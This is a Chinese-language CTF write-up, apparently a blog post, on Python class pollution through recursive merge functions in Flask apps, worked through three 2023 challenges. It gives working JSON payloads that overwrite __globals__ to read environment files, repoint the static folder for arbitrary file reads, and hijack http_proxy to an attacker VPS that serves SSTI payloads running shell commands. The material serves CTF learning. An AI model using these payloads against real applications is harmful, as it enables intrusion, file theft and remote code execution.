CTF 题型 python原型链污染 题记和总结
文章目录
- 一般特征关键函数(判断python原型链污染依据)
- 1.[GeekChanlleng 2023 ezpython]
- 2.[DASCTF 2023 七月挑战赛]
- **全局变量获取**
- 解题思路1 读env:
- 解题思路1等价:
- 解题思路2:污染static静态目录app:_static_folder(任意读文件)
- 3.[2023安洵杯 **Swagger docs]**
- 国际赛--Top 难度
- 总结和深入
参考: https://tttang.com/archive/1876/#toc__1 学习基础概念
一般特征关键函数(判断python原型链污染依据)
def merge(src, dst): //不会换成update你就不认识了吧
for k, v in src.items():
if hasattr(dst, '__getitem__'):
if dst.get(k) and type(v) == dict:
merge(v, dst.get(k))
else:
dst[k] = v
elif hasattr(dst, k) and type(v) == dict:
merge(v, getattr(dst, k))
else:
setattr(dst, k, v)
1.[GeekChanlleng 2023 ezpython]
官方docker:https://github.com/SycloverTeam/GeekChallenge2023/tree/main/Web/ezpython
import json
import os
from waf import waf
import importlib
from flask import Flask,render_template,request,redirect,url_for,session,render_template_string
app = Flask(__name__)
app.secret_key='jjjjggggggreekchallenge202333333'
class User():
def __init__(self):
self.username=""
self.password=""
self.isvip=False
class hhh(User):
def __init__(self):
self.username=""
self.password=""
registered_users=[]
@app.route('/')
def hello_world(): # put application's code here
return render_template("welcome.html")
@app.route('/play')
def play():
username=session.get('username')
if username:
return render_template('index.html',name=username)
else:
return redirect(url_for('login'))
@app.route('/login',methods=['GET','POST'])
def login():
if request.method == 'POST':
username=request.form.get('username')
password=request.form.get('password')
user = next((user for user in registered_users if user.username == username and user.password == password), None)
if user:
session['username'] = user.username
session['password']=user.password
return redirect(url_for('play'))
else:
return "Invalid login"
return redirect(url_for('play'))
return render_template("login.html")
@app.route('/register',methods=['GET','POST'])
def register():
if request.method == 'POST':
try:
if waf(request.data):
return "fuck payload!Hacker!!!"
data=json.loads(request.data)
if "username" not in data or "password" not in data:
return "连用户名密码都没有你注册啥呢"
user=hhh()
merge(data,user)
registered_users.append(user)
except Exception as e:
return "泰酷辣,没有注册成功捏"
return redirect(url_for('login'))
else:
return render_template("register.html")
@app.route('/flag',methods=['GET'])
def flag():
user = next((user for user in registered_users if user.username ==session['username'] and user.password == session['password']), None)
if user:
if user.isvip:
data=request.args.get('num')
if data:
if '0' not in data and data != "123456789" and int(data) == 123456789 and len(data) <=10:
flag = os.environ.get('geek_flag')
return render_template('flag.html',flag=flag)
else:
return "你的数字不对哦!"
else:
return "I need a num!!!"
else:
return render_template_string('这种神功你不充VIP也想学?<p><img src="{{url_for(\'static\',filename=\'weixin.png\')}}">要不v我50,我送你一个VIP吧,嘻嘻</p>')
else:
return "先登录去"
def merge(src, dst):
for k, v in src.items():
if hasattr(dst, '__getitem__'):
if dst.get(k) and type(v) == dict:
merge(v, dst.get(k))
else:
dst[k] = v
elif hasattr(dst, k) and type(v) == dict:
merge(v, getattr(dst, k))
else:
setattr(dst, k, v)
if __name__ == '__main__':
app.run(host="0.0.0.0",port="8888")
解题思路
注意代码中的类与对象关系
class User():
def __init__(self):
self.username=""
self.password=""
self.isvip=False
class hhh(User): #hhh类继承User类,就是User为hhh的父类
def __init__(self):
self.username=""
self.password=""
user=hhh()
可以通过 类似ssti的方法 拿属性方法 —→ 控制
__class__ : 拿对象的类
__base__: 拿类的父类
__class__
user---->hhh类
__base__
hhh类—>User类
在merge(data,user)
进行污染
@app.route('/register',methods=['GET','POST'])
def register():
if request.method == 'POST':
try:
if waf(request.data):
return "fuck payload!Hacker!!!"
data=json.loads(request.data)
if "username" not in data or "password" not in data:
return "连用户名密码都没有你注册啥呢"
user=hhh()
merge(data,user)
registered_users.append(user)
except Exception as e:
return "泰酷辣,没有注册成功捏"
return redirect(url_for('login'))
else:
return render_template("register.html")
现在我们要通过污染user.isvip=true
绕过判断进入 另个判断
if user.isvip:
data=request.args.get('num')
if data:
if '0' not in data and data != "123456789" and int(data) == 123456789 and len(data) <=10:
flag = os.environ.get('geek_flag')
return render_template('flag.html',flag=flag)
else:
return "你的数字不对哦!"
else:
return "I need a num!!!"
**注意:json识别unicode编码
**因此可以绕过关键词黑名单
payload: application/json
{"username":"admin","password":"123","__class__":{"__base__":{"isvip":"True"}}}
isvip unicode编码 \u0069\u0073\u0076\u0069\u0070
绕过 if '0' not in data and data != "123456789" and int(data) == 123456789 and len(data) <=10:
法一:+
+123456789
法二:全角数字
123456789
注意不能全部都是 全角
反思总结
类似js原型链污染,传递形式类似,都有 merge 覆盖,但不同于js原型链污染
js原型链污染: 控制 父类 没有的属性 向上污染
python原型链污染: 控制 当先类的 属性
2.[DASCTF 2023 七月挑战赛]
题目地址:https://buuoj.cn/match/matches/188/challenges#EzFlask
json识别unicode
参考:
https://blog.csdn.net/Luminous_song/article/details/132118473
https://blog.csdn.net/m0_63138919/article/details/132591908
import uuid
from flask import Flask, request, session
from secret import black_list
import json
app = Flask(__name__)
app.secret_key = str(uuid.uuid4())
def check(data):
for i in black_list:
if i in data:
return False
return True
def merge(src, dst):
for k, v in src.items():
if hasattr(dst, '__getitem__'):
if dst.get(k) and type(v) == dict:
merge(v, dst.get(k))
else:
dst[k] = v
elif hasattr(dst, k) and type(v) == dict:
merge(v, getattr(dst, k))
else:
setattr(dst, k, v)
class user():
def __init__(self):
self.username = ""
self.password = ""
pass
def check(self, data):
if self.username == data['username'] and self.password == data['password']:
return True
return False
Users = []
@app.route('/register',methods=['POST'])
def register():
if request.data:
try:
if not check(request.data):
return "Register Failed"
data = json.loads(request.data)
if "username" not in data or "password" not in data:
return "Register Failed"
User = user()
merge(data, User)
Users.append(User)
except Exception:
return "Register Failed"
return "Register Success"
else:
return "Register Failed"
@app.route('/login',methods=['POST'])
def login():
if request.data:
try:
data = json.loads(request.data)
if "username" not in data or "password" not in data:
return "Login Failed"
for user in Users:
if user.check(data):
session["username"] = data["username"]
return "Login Success"
except Exception:
return "Login Failed"
return "Login Failed"
@app.route('/',methods=['GET'])
def index():
return open(__file__, "r").read()
if __name__ == "__main__":
app.run(host="0.0.0.0", port=5010)
全局变量获取
在Python中,函数或类方法均具有一个__globals__属性,该属性将函数或类方法所申明的变量空间中的全局变量以字典的形式返回,这样就可以用__globals__来修改想要修改的全局变量值
解题思路1 读env:
污染 globals file --> …/…/…/proc/1/environ
拿对象的构造函数 等价于 拿类的初始化函数(其实本身就是一个东西)
构造函数(内部类方法) 生成对象自动调用
{"username":"admin","password":"123","__ini\u0074__":{"__globals__":{"__file__":"../../proc/1/environ"}}}
flag在环境变量
解题思路1等价:
先拿__class__
→ 1:__init__
拿对象的构造函数 等价于 拿类的初始化函数(其实本身就是一个东西)
payload:
{"username":"1213211","password":"12133","__class__":{"__ini\u0074__":{"__globals__":{"__file__":"../../../../proc/1/environ"}}}}
flag一般都在环境变量
解题思路2:污染static静态目录app:_static_folder(任意读文件)
_static_url_path
这个属性中存放的是flask中静态目录的值,默认该值为static。访问flask下的资源可以采用如http://domain/static/xxx,这样实际上就相当于访问_static_url_path目录下xxx的文件并将该文件内容作为响应内容返回
payload:
__globals__-->app-->_static_folder
{"username":"admin","password":"123","__ini\u0074__":{"__globals__":{"app":{"_static_folder":"/"}}}}
现在将__static_fold默认值指向 / 目录实现任意文件读取
http://domain/static/想读取的文件(从根目录开始)
3.[2023安洵杯 Swagger docs]
题目地址:https://github.com/D0g3-Lab/i-SOON_CTF_2023/tree/main/web/swagger%20docs
认识一般flask基础架构
app/
|- [app.py](http://app.py/)
|- [config.py](http://config.py/)
|- static/ 静态目录
| |- style.css
|- templates/
| |- index.html
|- blueprints/
| |- auth/
| |- **init**.py
| |- [views.py](http://views.py/)
| |- [models.py](http://models.py/)
|- **init**.py
题目开题
{
"swagger": "2.0",
"info": {
"description": "Interface API Documentation",
"version": "1.1",
"title": "Interface API"
},
"paths": {
"/api-base/v0/register": {
"post": {
"consumes": [
"application/json"
],
"summary": "User Registration API",
"description": "Used for user registration",
"parameters": [
{
"name": "body",
"in": "body",
"required": true,
"schema": {
"$ref": "#/definitions/UserRegistration"
}
}
],
"responses": {
"200": {
"description": "success"
},
"400": {
"description": "Invalid request parameters"
}
}
}
},
"/api-base/v0/login": {
"post": {
"consumes": [
"application/json"
],
"summary": "User Login API",
"description": "Used for user login",
"parameters": [
{
"name": "body",
"in": "body",
"required": true,
"schema": {
"$ref": "#/definitions/UserLogin"
}
}
],
"responses": {
"200": {
"description": "success"
},
"400": {
"description": "Invalid request parameters"
}
}
}
},
"/api-base/v0/search": {
"get": {
"summary": "Information Query API",
"description": "Used to query information",
"parameters": [
{
"name": "file",
"in": "query",
"required": true,
"type": "string"
},
{
"name": "id",
"in": "query",
"required": false,
"type": "string"
},
{
"name": "type",
"in": "query",
"required": false,
"type": "string",
"description": "Default JSON format.If type is 'text',Text format will be returned"
}
],
"responses": {
"200": {
"description": "success"
},
"400": {
"description": "Invalid request parameters"
},
"401": {
"description": "Unauthorized"
}
},
"security": [
{
"TokenAuth": []
}
]
}
},
"/api-base/v0/update": {
"post": {
"consumes": [
"application/json"
],
"summary": "Change Password API",
"description": "Used to change user password",
"parameters": [
{
"name": "password",
"in": "body",
"required": true,
"schema": {
"type": "object",
"properties": {
"password": {
"type": "string"
}
}
}
}
],
"responses": {
"200": {
"description": "success"
},
"400": {
"description": "Invalid request parameters"
},
"401": {
"description": "Unauthorized"
}
},
"security": [
{
"TokenAuth": []
}
]
}
},
"/api-base/v0/logout": {
"get": {
"summary": "Logout API",
"description": "Used for user logout",
"responses": {
"200": {
"description": "success"
},
"401": {
"description": "Unauthorized"
}
},
"security": [
{
"TokenAuth": []
}
]
}
}
},
"definitions": {
"UserRegistration": {
"type": "object",
"properties": {
"username": {
"type": "string"
},
"password": {
"type": "string"
}
}
},
"UserLogin": {
"type": "object",
"properties": {
"username": {
"type": "string"
},
"password": {
"type": "string"
}
}
}
},
"securityDefinitions": {
"TokenAuth": {
"type": "apiKey",
"name": "Authorization",
"in": "header"
}
},
"security": [
{
"TokenAuth": []
}
]
}
定义api接口功能
/api-base/v0/register 注册
{"username":1,"password":1}
/api-base/v0/login 登录
{"username":1,"password":1}
登录成功后可以正常使用功能
/api-base/v0/search 注意英文注解 type=text 返回原文
这存在任意文件读取
/api-base/v0/search=../../../proc/1/cmdline&type=text
读取 当前进程信息
../../../proc/1/cmdline-->执行文件 /app/run.sh--> 读源码 /app/app.py
类似的 ../../../../proc/1/environ 环境变量
proc 虚拟文件系统 可以访问 内核信息
1 代表 uid =1 一般为主系统
/api-base/v0/search 存在任意文件读取 漏洞 必须指定type=text
http://23.94.38.86:9002/api-base/v0/search?file=/proc/1/cmdline&type=text
可以看到系统开的执行命令
可以判断程序路径是/app
file=/proc/1/environ&type=text
环境变量中没有flag
通过读取/app/app.py
查看源码
#coding=gbk
import json
from flask import Flask, request, jsonify,send_file,render_template_string
import jwt
import requests
from functools import wraps
from datetime import datetime
import os
app = Flask(__name__)
app.config['TEMPLATES_RELOAD']=True
app.config['SECRET_KEY'] = 'fake_flag'
current_time = datetime.now().strftime('%Y-%m-%d %H:%M:%S')
response0 = {
'code': 0,
'message': 'failed',
'result': None
}
response1={
'code': 1,
'message': 'success',
'result': current_time
}
response2 = {
'code': 2,
'message': 'Invalid request parameters',
'result': None
}
def auth(func):
@wraps(func)
def decorated(*args, **kwargs):
token = request.cookies.get('token')
if not token:
return 'Invalid token', 401
try:
payload = jwt.decode(token, app.config['SECRET_KEY'], algorithms=['HS256'])
if payload['username'] == User.username and payload['password'] == User.password:
return func(*args, **kwargs)
else:
return 'Invalid token', 401
except:
return 'Something error?', 500
return decorated
@app.route('/',methods=['GET'])
def index():
return send_file('api-docs.json', mimetype='application/json;charset=utf-8')
@app.route('/api-base/v0/register', methods=['GET', 'POST'])
def register():
if request.method == 'POST':
username = request.json['username']
password = request.json['password']
User.setUser(username,password)
token = jwt.encode({'username': username, 'password': password}, app.config['SECRET_KEY'], algorithm='HS256')
User.setToken(token)
return jsonify(response1)
return jsonify(response2),400
@app.route('/api-base/v0/login', methods=['GET', 'POST'])
def login():
if request.method == 'POST':
username = request.json['username']
password = request.json['password']
try:
token = User.token
payload = jwt.decode(token, app.config['SECRET_KEY'], algorithms=['HS256'])
if payload['username'] == username and payload['password'] == password:
response = jsonify(response1)
response.set_cookie('token', token)
return response
else:
return jsonify(response0), 401
except jwt.ExpiredSignatureError:
return 'Invalid token', 401
except jwt.InvalidTokenError:
return 'Invalid token', 401
return jsonify(response2), 400
@app.route('/api-base/v0/update', methods=['POST', 'GET'])
@auth
def update_password():
try:
if request.method == 'POST':
try:
new_password = request.get_json()
if new_password:
update(new_password, User)
updated_token = jwt.encode({'username': User.username, 'password': User.password},
app.config['SECRET_KEY'], algorithm='HS256')
User.token = updated_token
response = jsonify(response1)
response.set_cookie('token',updated_token)
return response
else:
return jsonify(response0), 401
except:
return "Something error?",505
else:
return jsonify(response2), 400
except jwt.ExpiredSignatureError:
return 'Invalid token', 401
except jwt.InvalidTokenError:
return 'Invalid token', 401
def update(src, dst):
if hasattr(dst, '__getitem__'):
for key in src:
if isinstance(src[key], dict):
if key in dst and isinstance(src[key], dict):
update(src[key], dst[key])
else:
dst[key] = src[key]
else:
dst[key] = src[key]
else:
for key, value in src.items() :
if hasattr(dst,key) and isinstance(value, dict):
update(value,getattr(dst, key))
else:
setattr(dst, key, value)
@app.route('/api-base/v0/logout')
def logout():
response = jsonify({'message': 'Logout successful!'})
response.delete_cookie('token')
return response
@app.route('/api-base/v0/search', methods=['POST','GET'])
@auth
def api():
if request.args.get('file'):
try:
if request.args.get('id'):
id = request.args.get('id')
else:
id = ''
data = requests.get("http://127.0.0.1:8899/v2/users?file=" + request.args.get('file') + '&id=' + id)
if data.status_code != 200:
return data.status_code
if request.args.get('type') == "text":
return render_template_string(data.text)
else:
return jsonify(json.loads(data.text))
except jwt.ExpiredSignatureError:
return 'Invalid token', 401
except jwt.InvalidTokenError:
return 'Invalid token', 401
except Exception:
return 'something error?'
else:
return jsonify(response2)
class MemUser:
def setUser(self, username, password):
self.username = username
self.password = password
def setToken(self, token):
self.token = token
def __init__(self):
self.username="admin"
self.password="password"
self.token=jwt.encode({'username': self.username, 'password': self.password}, app.config['SECRET_KEY'], algorithm='HS256')
if __name__ == '__main__':
User = MemUser()
app.run(host='0.0.0.0')
updata函数提示我们可以用python原型链污染
def update(src, dst):
if hasattr(dst, '__getitem__'):
for key in src:
if isinstance(src[key], dict):
if key in dst and isinstance(src[key], dict):
update(src[key], dst[key])
else:
dst[key] = src[key]
else:
dst[key] = src[key]
else:
for key, value in src.items() :
if hasattr(dst,key) and isinstance(value, dict):
update(value,getattr(dst, key))
else:
setattr(dst, key, value)
类似merge函数(update) —>python原型链污染
update(new_password, User)#污染源
实现污染
@app.route('/api-base/v0/update', methods=['POST', 'GET'])
@auth
def update_password():
try:
if request.method == 'POST':
try:
new_password = request.get_json()#json数据传递
if new_password:
update(new_password, User)#污染源
updated_token = jwt.encode({'username': User.username, 'password': User.password},
app.config['SECRET_KEY'], algorithm='HS256')
User.token = updated_token
response = jsonify(response1)
response.set_cookie('token',updated_token)
return response
else:
return jsonify(response0), 401
except:
return "Something error?",505
else:
return jsonify(response2), 400
except jwt.ExpiredSignatureError:
return 'Invalid token', 401
except jwt.InvalidTokenError:
return 'Invalid token', 401
其中 User = MemUser()
MemUser类
class MemUser:
def setUser(self, username, password):
self.username = username
self.password = password
def setToken(self, token):
self.token = token
def __init__(self):
self.username="admin"
self.password="password"
self.token=jwt.encode({'username': self.username, 'password': self.password}, app.config['SECRET_KEY'], algorithm='HS256')
可以通过对象的__init__
直接拿到__globals__
属性实现控制python中的任意属性
还发现render_template_string (ssti的标识) 渲染字符串 到rce
return render_template_string(data.text)
思路:
通过控制 data.text 为实现SSTI的RCE
如何控制
法一:__globals__
->os->environ->http_proxy(设置代理)->再通过nc 转发tcp数据流(vps可控response内容)
payload: 通过污染http_proxy让每次请求通过代理服务器也就是我们的vps
通过nc 监听篡改请求
payload 向/api-base/v0/update提交json数据
{"__init__":{"__globals__":{"os":{"environ":{"http_proxy":"我们vps的地址:监听端口"}}}}}
{"__init__":{"__globals__":{"os":{"environ":{"http_proxy":"148.135.82.190:8888"}}}}}
可以污染成功
然后 vps上监听端口8888
访问/api-base/v0/search 注意带参数type=text触发渲染
/api-base/v0/search?file=/app/app.py&type=text
vps上接受到请求
HTTP/1.1 200 OK
{{lipsum.__globals__.__builtins__['__import__']('os').popen('ls').read()}}
构造响应包
可以看到响应包
读取2UARlN9KDhdmbhajd7gtamWuBf9CiFf0_FLAG文件
再次触发
HTTP/1.1 200 OK
{{lipsum.__globals__.__builtins__['__import__']('os').popen('cat 2U*').read()}}
可以拿到flag
如何理解nc
简易版的burp,可以实现tcp,udp信道的监听,数据的传递
nc -lvp 80
curl ip:80
vps 可控 返回内容
法二:__globals__
->requests->Response->text内容为payload
直接控制data.text 为我们ssti的payload
payload: 向/api-base/v0/update提交json数据
{"__init__":{"__globals__":{"requests":{"Response":{"text":"payload"}}}}}
例如:{"__init__":{"__globals__":{"requests":{"Response":{"text":"{{lipsum.__globals__.__builtins__['__import__']('os').popen('cat 2U*').read()}}"}}}}}
访问/api-base/v0/search?file=/app/app.py&type=text 触发
可以看到直接回显了 拿到flag
国际赛–Top 难度
https://github.com/Myldero/ctf-writeups/tree/master/idekCTF 2022/task manager
感兴趣的大佬可以挑战一下
总结和深入
类似js原型链污染,传递形式类似,都有 merge 覆盖,但不同于js原型链污染
js原型链污染: 控制 父类 没有的属性(向上污染)
python原型链污染: 控制 当先类的 属性
通过类似 SSTI 的方法 拿属性方法 —→ 控制
参考:https://tttang.com/archive/1876/#toc__1 进一步学习
标签:__,题型,return,python,app,username,CTF,password,data From: https://blog.csdn.net/qq_39947980/article/details/136625397